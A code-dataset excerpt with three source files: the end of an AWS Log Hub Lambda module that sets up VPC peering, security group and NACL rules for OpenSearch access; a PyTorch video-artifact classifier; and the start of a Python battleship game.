'SO8025')\nuser_agent_config = {\n 'user_agent_extra': f'AwsSolution/{solution_id}/{solution_version}'}\ndefault_config = config.Config(**user_agent_config)\n\ndefault_region = os.environ.get('AWS_REGION')\n\nloghub_vpc_id = os.environ.get('DEFAULT_VPC_ID')\nloghub_sg_id = os.environ.get('DEFAULT_SG_ID')\nloghub_private_subnet_ids_str = os.environ.get('DEFAULT_PRIVATE_SUBNET_IDS')\nec2 = boto3.client('ec2', config=default_config)\n\n\ndef handle_error(func):\n \"\"\" Decorator for exception handling \"\"\"\n\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except APIException as e:\n logger.error(e)\n raise e\n except Exception as e:\n logger.error(e)\n raise RuntimeError(\n 'Unknown exception, please check Lambda log for more details')\n\n return wrapper\nclass ClusterAutoImportManager:\n \"\"\"\n Currently do not consider processing ipv6 scenarios\n \"\"\"\n Anywhere_ipv4 = '0.0.0.0/0'\n\n def __init__(self, tags: None, ec2: boto3.Session.client, es_resp, loghub_vpc_id: str, loghub_sg_id: str,\n loghub_private_subnet_ids_str: str):\n self.tags = []\n if tags:\n for tag in tags:\n self.tags.append({\n 'Key': tag['key'],\n 'Value': tag['value'],\n })\n\n self.ec2 = ec2\n\n \"\"\"\n obtain aos_vpc_id,aos_subnet_ids,aos_sg_ids from 'es.describe_elasticsearch_domain' API \n \"\"\"\n\n es_vpc = es_resp['DomainStatus']['VPCOptions']\n self.aos_vpc_id = es_vpc['VPCId']\n self.aos_subnet_ids = es_vpc['SubnetIds']\n self.aos_sg_ids = es_vpc['SecurityGroupIds']\n\n \"\"\"\n the network_acl_id will be set value when calling 'validate_nacl()'\n \"\"\"\n self.aos_network_acl_id = None\n\n self.loghub_vpc_id = loghub_vpc_id\n self.loghub_sg_id = 
loghub_sg_id\n\n self.loghub_private_subnet_ids_str = loghub_private_subnet_ids_str\n self.loghub_private_subnet_ids =self.loghub_private_subnet_ids_str.split(',')\n\n \"\"\"\n By default, it is assumed that the vpcs are the same. \n Later, it will be verified whether the ids of the two vpcs are the same. \n If they are not the same, is_same_vpc will be changed to false.\n \"\"\"\n self.is_same_vpc = True\n\n \"\"\"\n The cidr of aos vpc does not conflict with the cidr of loghub vpc by default. \n When the ids of the two vpcs are different, the following code starts to verify whether the cidr is the same.\n \"\"\"\n\n self.vpc_peering_connection_id = None\n\n vpc_ids = [self.aos_vpc_id]\n if self.aos_vpc_id != self.loghub_vpc_id:\n self.is_same_vpc = False\n self.vpc_peering_connection_status = None\n\n self.loghub_vpc_subnet_ids = self.get_vpc_subnets(vpc_id=self.loghub_vpc_id)\n vpc_ids.append(self.loghub_vpc_id)\n for vpc_id in vpc_ids:\n try:\n response = self.ec2.describe_vpcs(\n VpcIds=[vpc_id],\n DryRun=False\n )\n except ClientError as e:\n logger.error(e)\n raise e\n\n # init cidr\n if 'Vpcs' not in response or response['Vpcs'] is False:\n raise APIException(f'the VPC is Not Found, id is {vpc_id}')\n if vpc_id == self.aos_vpc_id:\n self.aos_cidr_block = response['Vpcs'][0]['CidrBlock']\n else:\n self.loghub_cidr_block = response['Vpcs'][0]['CidrBlock']\n if not self.check_cidr_overlaps(self.aos_cidr_block, self.loghub_cidr_block):\n raise APIException('Log Hub VPC CIDR is conflict with AOS VPC!')\n self.vpc_peering_retry=0\n else:\n\n # Obtain cidr in the same vpc scenario.\n try:\n response = self.ec2.describe_vpcs(\n VpcIds=[self.aos_vpc_id],\n DryRun=False\n )\n except ClientError as e:\n logger.error(e)\n raise e\n if 'Vpcs' not in response:\n raise APIException(f'the VPC is Not Found, id is {self.aos_vpc_id}')\n self.aos_cidr_block = response['Vpcs'][0]['CidrBlock']\n self.loghub_cidr_block = self.aos_cidr_block\n\n # obtain aos_vpc_subnet_ids from 'ec2.describe_subnets' API\n self.aos_vpc_subnet_ids = self.get_vpc_subnets(vpc_id=self.aos_vpc_id)\n\n def check_cidr_overlaps(self, aos_cidr: str, loghub_cidr: str):\n \"\"\"\n Using ipaddr lib to check: True is Pass\n \"\"\"\n aos_network = ipaddr.IPNetwork(aos_cidr)\n loghub_network = ipaddr.IPNetwork(loghub_cidr)\n if not aos_network.overlaps(loghub_network) and not loghub_network.overlaps(aos_network):\n return True\n else:\n return False\n\n def validate_same_vpc(self):\n \"\"\"\n Check if it is the same vpc, return True if the same\n \"\"\"\n return self.is_same_vpc\n\n def validate_sg(self):\n \"\"\"\n Using 'ec2.describe_security_group_rules' API to check whether the rules of the aos security group\n allow access from the loghub process security group.\n Rules:\n 1.sg_rule['IsEgress']: False is inbound rule\n 2.sg_rule['IpProtocol']: tcp or -1 to specify all protocols\n 3.sg_rule['CidrIpv4']:\n 3.1. check 0.0.0.0/16 in same VPC scenarios\n 3.2. 
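check_cidr_overlaps above leans on the legacy third-party ipaddr package and tests overlap in both directions, although overlaps() is symmetric. A sketch of the same check with the standard-library ipaddress module (Python 3.3+), offered as an alternative rather than a patch to the class:

import ipaddress

def cidrs_disjoint(cidr_a: str, cidr_b: str) -> bool:
    """True when the two CIDR blocks share no addresses."""
    net_a = ipaddress.ip_network(cidr_a, strict=False)
    net_b = ipaddress.ip_network(cidr_b, strict=False)
    return not net_a.overlaps(net_b)   # symmetric, so one call suffices

assert cidrs_disjoint('10.0.0.0/16', '10.1.0.0/16')
assert not cidrs_disjoint('10.0.0.0/8', '10.1.0.0/16')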
check loghub_cidr_block or 0.0.0.0/16 in different VPC scenarios\n 4.check sg_rule['ReferencedGroupInfo']['GroupId'] in same VPC scenarios: loghub_sg_id\n 5.sg_rule['FromPort'] <= 443 and sg_rule['ToPort'] >= 443\n \"\"\"\n success = False\n response = self.ec2.describe_security_group_rules(\n Filters=[\n {\n 'Name': 'group-id',\n 'Values': self.aos_sg_ids,\n },\n ],\n DryRun=False\n )\n if 'SecurityGroupRules' in response:\n sg_rules = response['SecurityGroupRules']\n for sg_rule in sg_rules:\n if self.validate_same_vpc():\n if sg_rule['IsEgress'] is False and (\n sg_rule['IpProtocol'] == 'tcp' or sg_rule['IpProtocol'] == '-1') and \\\n (sg_rule['FromPort'] <= 443) and (sg_rule['ToPort'] >= 443):\n if 'ReferencedGroupInfo' in sg_rule:\n if sg_rule['ReferencedGroupInfo']['GroupId'] == self.loghub_sg_id:\n success = True\n break\n elif 'CidrIpv4' in sg_rule:\n if sg_rule['CidrIpv4'] == ClusterAutoImportManager.Anywhere_ipv4:\n success = True\n break\n else:\n if 'CidrIpv4' in sg_rule:\n if sg_rule['IsEgress'] is False and \\\n (sg_rule['CidrIpv4'] == self.loghub_cidr_block or\n sg_rule['CidrIpv4'] == ClusterAutoImportManager.Anywhere_ipv4) and \\\n sg_rule['IpProtocol'] == 'tcp' and \\\n sg_rule['FromPort'] <= 443 and sg_rule['ToPort'] >= 443:\n success = True\n break\n\n return success\n\n def validate_nacl(self):\n \"\"\"\n Using 'ec2.describe_network_acls' API to check whether the rules of the aos nacl\n \"\"\"\n success = False\n response = self.ec2.describe_network_acls(\n Filters=[\n {\n 'Name': 'association.subnet-id',\n 'Values': self.aos_vpc_subnet_ids,\n },\n {\n 'Name': 'vpc-id',\n 'Values': [\n self.aos_vpc_id,\n ]\n }\n ],\n DryRun=False\n )\n\n if 'NetworkAcls' in response:\n nacls = response['NetworkAcls']\n for nacl in nacls:\n if 'NetworkAclId' in nacl:\n self.aos_network_acl_id = nacl['NetworkAclId']\n if 'Entries' in nacl:\n entries = nacl['Entries']\n for entry in entries:\n if entry['Egress'] is False and (\n entry['CidrBlock'] == ClusterAutoImportManager.Anywhere_ipv4 or\n entry['CidrBlock'] == self.loghub_cidr_block) and (\n entry['Protocol'] == '-1' or entry['Protocol'] == '6') and \\\n entry['RuleAction'] == 'allow':\n if 'PortRange' in entry:\n if (entry['PortRange']['From'] <= 443) and (entry['PortRange']['To'] >= 443):\n success = True\n break\n elif entry['Protocol'] == '-1':\n success = True\n break\n if success:\n break\n\n return success\n\n def validate_aos_vpc_routing(self):\n return self.validate_routing(self.aos_vpc_id, self.aos_subnet_ids, self.loghub_cidr_block)\n\n def validate_loghub_vpc_routing(self):\n return self.validate_routing(self.loghub_vpc_id, self.loghub_private_subnet_ids, self.aos_cidr_block)\n\n def validate_routing(self, vpc_id, vpc_subnet_ids, cidr_block):\n \"\"\"\n Check if routing table contains vpc_peering_connection_id.\n 1.No need to check in the same vpc scenario, it returns True.\n 2.Calling 'get_vpc_peering_connections' API to vpc_peering_connection_id.\n 3.Using 'ec2.describe_route_tables' API to check, if it returns True, the verification passes.\n 4.In different VPC scenarios, you not only need to call 'validate_aos_vpc_routing()'\n to verify the routing table of aos vpc, but also call 'validate_loghub_vpc_routing()'\n to verify the routing table of the vpc of loghub.\n \"\"\"\n success = False\n if not self.validate_same_vpc():\n if self.get_vpc_peering_connections() is None:\n return False\n\n response = self.ec2.describe_route_tables(\n Filters=[\n {\n 'Name': 'vpc-id',\n 'Values': [\n vpc_id\n ]\n },\n {\n 'Name': 
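validate_sg and validate_nacl above repeat one core predicate: does a rule admit TCP on port 443. A distilled sketch of that predicate, where rule is a plain dict standing in for the boto3 response entries and the -1 port convention is assumed to be how EC2 reports all-traffic rules:

HTTPS_PORT = 443

def rule_allows_https(rule: dict) -> bool:
    """True if a rule covers TCP/443; protocol '-1' means every protocol."""
    if rule.get('IpProtocol') not in ('tcp', '-1'):
        return False
    lo, hi = rule.get('FromPort', -1), rule.get('ToPort', -1)
    if (lo, hi) == (-1, -1):
        return True          # all-traffic rules report port range -1..-1 (assumption)
    return lo <= HTTPS_PORT <= hi

assert rule_allows_https({'IpProtocol': '-1', 'FromPort': -1, 'ToPort': -1})
assert rule_allows_https({'IpProtocol': 'tcp', 'FromPort': 0, 'ToPort': 65535})
assert not rule_allows_https({'IpProtocol': 'udp', 'FromPort': 443, 'ToPort': 443})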
'association.subnet-id',\n 'Values': vpc_subnet_ids,\n },\n {\n 'Name': 'route.vpc-peering-connection-id',\n 'Values': [self.vpc_peering_connection_id],\n },\n {\n 'Name': 'route.destination-cidr-block',\n 'Values': [cidr_block],\n }\n ],\n DryRun=False\n )\n count = 0\n if 'RouteTables' in response:\n route_tables = response['RouteTables']\n for route_table in route_tables:\n if 'Routes' in route_table:\n routes = route_table['Routes']\n for route in routes:\n if 'VpcPeeringConnectionId' in route and 'State' in route and \\\n route['VpcPeeringConnectionId'] == self.vpc_peering_connection_id and \\\n route['State'] == 'active':\n count = count + 1\n # success = True\n # break\n # if success:\n # break\n if count == len(vpc_subnet_ids):\n success = True\n else:\n success = True\n return success\n\n def get_vpc_subnets(self, vpc_id: str):\n \"\"\"\n Obtain the subnet_ids of vpc from \"ec2.describe_subnets\" API.\n \"\"\"\n filters = [\n {\n 'Name': 'vpc-id',\n 'Values': [\n vpc_id,\n ]\n },\n ] \n response = self.ec2.describe_subnets(\n Filters=filters,\n DryRun=False\n )\n subnet_ids = []\n if 'Subnets' in response:\n subnets = response['Subnets']\n for subnet in subnets: \n subnet_ids.append(subnet['SubnetId'])\n else:\n raise APIException(f'Please check the subnets of vpc, vpc id is {vpc_id}')\n return subnet_ids\n\n def get_vpc_peering_connections(self):\n \"\"\"\n Obtain the vpc_peering_connection_id from \"ec2.describe_vpc_peering_connections\" API by aos_vpc_id\n and loghub_vpc_id\n \"\"\"\n if not self.validate_same_vpc():\n response = self.ec2.describe_vpc_peering_connections(\n Filters=[\n {\n 'Name': 'requester-vpc-info.vpc-id',\n 'Values': [\n self.loghub_vpc_id,\n ]\n },\n {\n 'Name': 'accepter-vpc-info.vpc-id',\n 'Values': [\n self.aos_vpc_id,\n ]\n },\n {\n 'Name': 'status-code',\n 'Values': [\n 'active', 'provisioning', 'pending-acceptance'\n ]\n },\n ],\n DryRun=False\n )\n if 'VpcPeeringConnections' in response and response['VpcPeeringConnections']:\n self.vpc_peering_connection_id = response['VpcPeeringConnections'][0]['VpcPeeringConnectionId']\n self.vpc_peering_connection_status = response['VpcPeeringConnections'][0]['Status']\n return self.vpc_peering_connection_id\n\n def create_sg_rule(self):\n \"\"\"\n add sg ingress rule to allow members in the loghub processing security group to access port 443\n 1.same vpc: allow loghub_sg_id\n 2.not the same vpc: allow loghub_cidr_block\n \"\"\"\n if self.validate_same_vpc():\n ip_permissions = [\n {\n 'FromPort': 443,\n 'IpProtocol': 'tcp',\n 'UserIdGroupPairs': [\n {\n 'Description': 'Loghub Processing Rule',\n 'GroupId': self.loghub_sg_id,\n 'VpcId': self.aos_vpc_id\n },\n ],\n 'ToPort': 443,\n },\n ]\n else:\n ip_permissions = [\n {\n 'FromPort': 443,\n 'IpProtocol': 'tcp',\n 'IpRanges': [\n {\n 'CidrIp': self.loghub_cidr_block,\n 'Description': 'Loghub Processing Rule'\n },\n ],\n 'ToPort': 443,\n },\n ]\n response = self.ec2.authorize_security_group_ingress(\n GroupId=self.aos_sg_ids[0],\n IpPermissions=ip_permissions,\n DryRun=False,\n )\n\n if 'Return' in response and response['Return'] is True:\n return True\n else:\n return False\n\n def create_nacl_entry(self):\n \"\"\"\n Add an inbound rule to NACL to allow Loghub CIDR to allow access to port 443.\n This method only needs to be called when the vpc of loghub is different from that of aos\n \"\"\"\n self.ec2.create_network_acl_entry(\n CidrBlock=self.loghub_cidr_block,\n DryRun=False,\n Egress=False,\n NetworkAclId=self.aos_network_acl_id,\n PortRange={\n 'From': 443,\n 
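get_vpc_subnets above issues a single describe_subnets call, which can silently truncate in a VPC whose subnet list spans more than one response page. A hedged sketch using the boto3 paginator instead; the VPC id in the usage comment is hypothetical:

import boto3

def list_subnet_ids(ec2_client, vpc_id: str) -> list:
    """Collect every subnet id in a VPC, following pagination."""
    paginator = ec2_client.get_paginator('describe_subnets')
    pages = paginator.paginate(Filters=[{'Name': 'vpc-id', 'Values': [vpc_id]}])
    return [subnet['SubnetId'] for page in pages for subnet in page['Subnets']]

# list_subnet_ids(boto3.client('ec2'), 'vpc-0123456789abcdef0')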
'To': 443\n },\n Protocol='6',\n RuleAction='allow',\n RuleNumber=666\n )\n\n def create_vpc_peering_connection(self):\n \"\"\"\n Create vpc peering between Loghub vpc and aos vpc.\n This method only needs to be called when the vpc of loghub is different from that of AOS.\n \"\"\"\n if not self.validate_same_vpc():\n tag_specifications = []\n if self.tags:\n tag_specifications.append({\n 'ResourceType': 'vpc-peering-connection',\n 'Tags': self.tags,\n\n })\n response = self.ec2.create_vpc_peering_connection(\n DryRun=False,\n PeerVpcId=self.aos_vpc_id,\n VpcId=self.loghub_vpc_id,\n TagSpecifications=tag_specifications\n )\n if 'VpcPeeringConnection' in response:\n vpc_peering_connection_id = response['VpcPeeringConnection']['VpcPeeringConnectionId']\n self.accept_vpc_peering_connection(vpc_peering_connection_id)\n\n def accept_vpc_peering_connection(self, vpc_peering_connection_id: str):\n try:\n response = self.ec2.accept_vpc_peering_connection(\n DryRun=False,\n VpcPeeringConnectionId=vpc_peering_connection_id\n )\n if 'VpcPeeringConnection' in response:\n status = response['VpcPeeringConnection']['Status']\n logger.info(\n f'accept vpc peering, status is {status},VpcPeeringConnectionId is {vpc_peering_connection_id}')\n except ClientError as ex:\n if ex.response['Error']['Code'] == 'InvalidVpcPeeringConnectionID.NotFound':\n time.sleep(1)\n self.vpc_peering_retry=self.vpc_peering_retry+1\n if self.vpc_peering_retry==4:\n raise ex\n return self.accept_vpc_peering_connection(vpc_peering_connection_id)\n else:\n raise ex\n\n def create_aos_route(self):\n \"\"\"\n Create route in the ids of aos.\n \"\"\"\n aos_route_table_ids = self.get_route_table_ids(self.aos_vpc_id, self.aos_subnet_ids)\n for aos_route_table_id in aos_route_table_ids:\n self.create_route(self.loghub_cidr_block, aos_route_table_id)\n\n def create_loghub_route(self):\n \"\"\"\n Create route in the vpc of loghub\n \"\"\"\n loghub_route_table_ids = self.get_route_table_ids(self.loghub_vpc_id, self.loghub_private_subnet_ids)\n for loghub_route_table_id in loghub_route_table_ids:\n self.create_route(self.aos_cidr_block, loghub_route_table_id)\n\n def create_route(self, cidr_block, route_table_id):\n \"\"\"\n create a route in the route table for vpc peering connection\n \"\"\"\n\n try:\n response = self.ec2.create_route(\n DestinationCidrBlock=cidr_block,\n DryRun=False,\n RouteTableId=route_table_id,\n VpcPeeringConnectionId=self.vpc_peering_connection_id\n )\n if response and 'Return' in response and response['Return'] is True:\n return True\n else:\n return False\n except ClientError as ex:\n if ex.response['Error']['Code'] == 'RouteAlreadyExists':\n return True\n else:\n raise ex\n\n def get_route_table_ids(self, vpc_id: str, subnet_ids: list):\n \"\"\"\n Obtain the route table id from calling 'describe_route_tables' API by vpc_id, subnet_ids\n \"\"\"\"\"\n response = self.ec2.describe_route_tables(\n Filters=[\n {\n 'Name': 'vpc-id',\n 'Values': [\n vpc_id\n ]\n },\n {\n 'Name': 'association.subnet-id',\n 'Values': subnet_ids,\n }\n ],\n DryRun=False\n )\n route_table_ids = []\n if 'RouteTables' in response:\n route_tables = response['RouteTables']\n for route_table in route_tables:\n if 'Associations' in route_table:\n associations = route_table['Associations']\n for association in associations:\n route_table_ids.append(association['RouteTableId'])\n\n if not route_table_ids:\n raise APIException(f'Please check the route table of vpc, vpc id is {vpc_id}')\n return route_table_ids\n\n def check_all(self):\n if not 
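accept_vpc_peering_connection above retries through recursion, with the attempt counter kept on the instance. An equivalent iterative sketch; the retry budget of 4 and the one-second sleep mirror the original's values:

import time
from botocore.exceptions import ClientError

def accept_with_retry(ec2_client, peering_id: str, attempts: int = 4):
    """Retry while the freshly created peering id propagates through EC2."""
    for attempt in range(attempts):
        try:
            return ec2_client.accept_vpc_peering_connection(
                VpcPeeringConnectionId=peering_id)
        except ClientError as ex:
            if ex.response['Error']['Code'] != 'InvalidVpcPeeringConnectionID.NotFound':
                raise
            if attempt == attempts - 1:
                raise            # budget exhausted, surface the original error
            time.sleep(1)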
self.validate_sg():\n self.create_sg_rule()\n if not self.validate_nacl():\n self.create_nacl_entry()\n if not self.get_vpc_peering_connections():\n self.create_vpc_peering_connection()\n elif self.vpc_peering_connection_status == 'pending-acceptance':\n self.accept_vpc_peering_connection(self.vpc_peering_connection_id)\n if not self.validate_aos_vpc_routing():\n self.create_aos_route()\n if not self.validate_loghub_vpc_routing():\n self.create_loghub_route()\n\n def check_all_aos_cidr_overlaps(self,region=default_region,existed_aos_list=list())->bool:\n \"\"\"\n Using ipaddr lib to check: True is Pass\n \"\"\"\n not_conflict=True\n import_in_same_vpc=False\n if self.aos_vpc_id != self.loghub_vpc_id:\n if not existed_aos_list or len(existed_aos_list)==0:\n return True \n es = boto3.client('es', region_name=region, config=default_config)\n vpc_ids=[]\n for aos in existed_aos_list:\n domain_name=aos['domainName']\n existed_aos_region=aos['region']\n try:\n if region!=existed_aos_region:\n region=existed_aos_region\n es = boto3.client('es', region_name=region, config=default_config)\n es_resp = es.describe_elasticsearch_domain(DomainName=domain_name)\n es_vpc = es_resp['DomainStatus']['VPCOptions']\n if self.aos_vpc_id==es_vpc['VPCId']:\n import_in_same_vpc=True\n break\n vpc_ids.append(es_vpc['VPCId'])\n except ClientError as e:\n if e.response['Error']['Code'] == 'ResourceNotFoundException':\n raise APIException('OpenSearch Domain Not Found')\n else:\n raise e\n if not import_in_same_vpc:\n try:\n response = self.ec2.describe_vpcs(VpcIds=vpc_ids,DryRun=False)\n except ClientError as e:\n logger.error(e)\n raise e\n # init cidr\n if 'Vpcs' not in response or response['Vpcs'] is False:\n raise APIException(f'the VPC is Not Found, id list is {vpc_ids}')\n \n vpcs=response['Vpcs']\n for vpc in vpcs:\n existed_aos_cidr_block = vpc['CidrBlock'] \n if not self.check_cidr_overlaps(self.aos_cidr_block, existed_aos_cidr_block):\n raise APIException(\"We can't import AOS, its CIDR conflicts with imported AOS!\")\n \n return not_conflict\n\n \n \n ","repo_name":"AlbertMingXu/log-hub","sub_path":"source/constructs/lambda/api/cluster/cluster_auto_import_mgr.py","file_name":"cluster_auto_import_mgr.py","file_ext":"py","file_size_in_byte":24342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"71769753715","text":"import os\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom models.detector import build_detector_S, build_detector_B\r\nfrom models.modules.RFB import RFB_modified, RFB3D_modified, BasicConv2d\r\n\r\nPATH_CWD = os.path.dirname(os.path.abspath(__file__))\r\n\r\n\r\nclass TAC(nn.Module):\r\n \"\"\"spatial-temporal artifact tracking Module\"\"\"\r\n\r\n def __init__(self, num_class, in_channels, mid_channel=16, lstm_channel=320, num_layers=1):\r\n super().__init__()\r\n\r\n self.bconv1_x = BasicConv2d(in_channels[0], in_channels[0] // 2, 3, padding=1)\r\n self.bconv1_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n self.bconv2_x = BasicConv2d(in_channels[1], in_channels[1] // 2, 3, padding=1)\r\n self.bconv2_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n self.bconv3_x = BasicConv2d(in_channels[2], in_channels[2] // 2, 3, padding=1)\r\n self.bconv3_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n self.bconv4_x = BasicConv2d(in_channels[3], in_channels[3] // 2, 3, padding=1)\r\n self.bconv4_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n\r\n self.down_sample = nn.MaxPool2d(3, stride=2, padding=1)\r\n\r\n self.fusion1 = 
self.get_fusion_sequential(in_channels[1] // 2 + in_channels[0] // 2 + 2 * mid_channel,in_channels[0])\r\n self.fusion2 = self.get_fusion_sequential(in_channels[2] // 2 + in_channels[0] + mid_channel, in_channels[1])\r\n self.fusion3 = self.get_fusion_sequential(in_channels[3] // 2 + in_channels[1] + mid_channel, in_channels[2])\r\n self.ave_pool = nn.AdaptiveAvgPool2d((1, 1))\r\n\r\n self.lstm = nn.LSTM(in_channels[2], lstm_channel, num_layers, batch_first=True)\r\n self.fc = nn.Linear(lstm_channel, num_class)\r\n\r\n @staticmethod\r\n def get_fusion_sequential(in_channel, out_channel):\r\n return nn.Sequential(\r\n BasicConv2d(in_channel, out_channel, 1),\r\n BasicConv2d(out_channel, out_channel, kernel_size=(3, 5), padding=(1, 2)),\r\n BasicConv2d(out_channel, out_channel, kernel_size=(5, 3), padding=(2, 1)),\r\n BasicConv2d(out_channel, out_channel, 3, padding=(5, 5), dilation=(5, 5))\r\n )\r\n\r\n def forward(self, x, y, t):\r\n assert isinstance(x, list), f\"The input type of x should be list\"\r\n assert isinstance(y, list), \"The input type of y should be list\"\r\n f1, f2, f3, f4 = x\r\n y1, y2, y3, y4 = y\r\n\r\n f1 = torch.cat([self.bconv1_x(f1 + f1 * torch.sigmoid(y1)), self.bconv1_y(y1)], dim=1)\r\n f2 = torch.cat([self.bconv2_x(f2 + f2 * torch.sigmoid(y2)), self.bconv2_y(y2)], dim=1)\r\n f3 = torch.cat([self.bconv3_x(f3 + f3 * torch.sigmoid(y3)), self.bconv3_y(y3)], dim=1)\r\n f4 = torch.cat([self.bconv4_x(f4), self.bconv4_y(y4)], dim=1)\r\n\r\n f1 = self.down_sample(f1)\r\n f2 = self.down_sample(self.fusion1(torch.cat([f1, f2], dim=1)))\r\n f3 = self.down_sample(self.fusion2(torch.cat([f2, f3], dim=1)))\r\n f4 = self.fusion3(torch.cat([f3, f4], dim=1))\r\n x = self.ave_pool(f4)\r\n bt, c, h, w = x.shape\r\n y = x.view([bt // t, t, c])\r\n y, _ = self.lstm(y)\r\n y = self.fc(y[:, -1, :])\r\n return y\r\n\r\n\r\nclass Classifier(nn.Module):\r\n def __init__(self, detector, num_class, in_channels, mid_channel=16):\r\n super(Classifier, self).__init__()\r\n self.detector = detector\r\n self.tac = TAC(num_class=num_class, mid_channel=mid_channel, in_channels=in_channels)\r\n\r\n self._freeze_detector()\r\n\r\n def forward(self, x):\r\n b, c, t, h, w = x.shape\r\n x = x.permute(0, 2, 1, 3, 4).reshape([b * t, c, h, w])\r\n list_dtc_feat, list_dtc_result = self.detector.forward_for_classifier(x)\r\n\r\n list_dtc_result = list_dtc_result[1:][::-1]\r\n\r\n list_dtc_feat_re = []\r\n for i, dtc_result in enumerate(list_dtc_result):\r\n fr = list_dtc_result[i].shape[-1]\r\n list_dtc_feat_re.append(list_dtc_feat[i].reshape([b * t, fr, fr, -1]).permute(0, 3, 1, 2))\r\n\r\n y = self.tac(list_dtc_feat_re, list_dtc_result, t)\r\n return y\r\n\r\n def get_training_parameters(self):\r\n return filter(lambda p: p.requires_grad, self.parameters())\r\n\r\n def _freeze_detector(self):\r\n self.detector.train(False)\r\n for param in self.detector.parameters():\r\n param.requires_grad = False\r\n\r\n def train(self, mode=True):\r\n \"\"\"Convert the model into training mode while keep layers freezed.\"\"\"\r\n super(Classifier, self).train(mode)\r\n self._freeze_detector()\r\n\r\n\r\ndef build_classifier_S(neck_depth, path_checkpoint_dtc=None):\r\n detector, dim = build_detector_S(frozen_stages=4, return_dim=True,neck_depth=neck_depth)\r\n if path_checkpoint_dtc == \"\" or not os.path.exists(path_checkpoint_dtc) or path_checkpoint_dtc is None:\r\n print(f\"detector is not loaded to trained weights: {path_checkpoint_dtc}\")\r\n else:\r\n checkpoint_detector = torch.load(path_checkpoint_dtc)\r\n 
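Classifier._freeze_detector and its train() override above implement the usual frozen-backbone recipe: zero out requires_grad and re-apply eval mode after every .train() call. A self-contained sketch of that pattern on a generic backbone/head pair, not the project's actual classes:

import torch.nn as nn

class FrozenBackboneModel(nn.Module):
    def __init__(self, backbone: nn.Module, head: nn.Module):
        super().__init__()
        self.backbone = backbone
        self.head = head
        self._freeze_backbone()

    def _freeze_backbone(self):
        self.backbone.train(False)          # fix BatchNorm/Dropout behaviour
        for param in self.backbone.parameters():
            param.requires_grad = False     # exclude from optimizer updates

    def train(self, mode: bool = True):
        super().train(mode)                 # this flips the backbone back to training mode...
        self._freeze_backbone()             # ...so re-freeze it, mirroring Classifier.train above
        return self

    def forward(self, x):
        return self.head(self.backbone(x))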
detector.load_state_dict(checkpoint_detector['model_state_dict'])\r\n print(\"detector weights is successfully loaded, the best metric is\", checkpoint_detector['metric_best'])\r\n classifier = Classifier(detector, num_class=2, in_channels=[dim, dim * 2, dim * 4, dim * 8])\r\n return classifier\r\n\r\ndef build_classifier_B(neck_depth, path_checkpoint_dtc=None):\r\n detector, dim = build_detector_B(frozen_stages=4, return_dim=True,neck_depth=neck_depth)\r\n if path_checkpoint_dtc == \"\" or not os.path.exists(path_checkpoint_dtc) or path_checkpoint_dtc is None:\r\n print(f\"detector is not loaded to trained weights: {path_checkpoint_dtc}\")\r\n else:\r\n checkpoint_detector = torch.load(path_checkpoint_dtc)\r\n detector.load_state_dict(checkpoint_detector['model_state_dict'])\r\n print(\"detector weights is successfully loaded, the best metric is\", checkpoint_detector['metric_best'])\r\n classifier = Classifier(detector, num_class=2, in_channels=[dim, dim * 2, dim * 4, dim * 8])\r\n return classifier\r\n\r\n\r\nif __name__ == '__main__':\r\n import time\r\n\r\n ti = time.time()\r\n \"\"\"tem = 9\r\n dummy_x = []\r\n for i in range(tem):\r\n dummy_x += [torch.randn(1, 1, 28, 28), torch.randn(1, 1, 7, 7), torch.randn(1, 1, 14, 14),\r\n torch.randn(1, 1, 28, 28), torch.randn(1, 1, 56, 56), torch.randn(1, 1, 224, 224)]\r\n model = NSCC(2)\"\"\"\r\n\r\n dummy_x = torch.rand(8, 3, 11, 224, 224).to(\"cuda:0\")\r\n model = build_classifier_S([4,4,2,2],\r\n path_checkpoint_dtc=r\"D:\\MyWorkPlace\\python\\ProjectZZA\\tools\\detection\\2023-10-18-16\\checkpoint_best.pth\").to(\r\n \"cuda:0\")\r\n a = model(dummy_x)\r\n print(time.time() - ti)\r\n pass\r\n","repo_name":"Charluelexia/two_stage","sub_path":"models/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11535673252","text":"# Adam Fernandes\n# November 2019\n# Battleship Game: human v. ai; game is immediately loaded up with preset ships.\n# Optimized to run from terminal/command prompt; formatting can look wonky on certain IDEs (for example: PyCharm).\n\nimport random\n\n# The boards are the visible outputs to stdout, whereas the goals will contain the ships that the player and the\n# ai are trying to sink (in other words, the opponent's ship locations).\nplayer_board = None\nai_board = None\nplayer_goals = None\nai_goals = None\n\n# The first dictionaries hold the lengths for each type of ship (abbreviations of the ships are the keys).\n# Note that ship_to_length variables detail what the opponent wants to destroy.\n# The second dictionary holds the longer names for each type of ship (abbreviations of the ships are the keys).\nai_ship_to_length = {'P': 2, 'D': 3, 'B': 4, 'C': 5}\nplayer_ship_to_length = {'P': 2, 'D': 3, 'B': 4, 'C': 5}\nship_to_name = {'P': \"patrol boat\", 'D': \"destroyer\", 'B': \"battleship\", 'C': \"carrier\"}\n\n# 14 lives for player, 14 for ai, because total area for the ships amount to 14.\nplayer_lives = 14\nai_lives = 14\n\n# If orientation is 1, the ship orientation is vertical. If 0, horizontal.\n# Ship row and ship column hold the corresponding coordinates of the ship for\n# when the ships are being assigned randomly to the boards.\nship_orientation = None\nship_row = None\nship_column = None\n\n# If turn is odd, player's turn. 
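In build_classifier_S/_B above, the guard evaluates os.path.exists(path_checkpoint_dtc) before the `is None` test, so passing None raises TypeError instead of taking the "weights not loaded" branch. A reordered sketch that short-circuits None first:

import os
from typing import Optional

import torch

def load_detector_weights(detector, path: Optional[str]):
    """Load a checkpoint only when the path is present and exists on disk."""
    if path is None or path == '' or not os.path.exists(path):
        print(f'detector is not loaded to trained weights: {path}')
        return detector
    checkpoint = torch.load(path)
    detector.load_state_dict(checkpoint['model_state_dict'])
    print('detector weights loaded, best metric:', checkpoint['metric_best'])
    return detector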
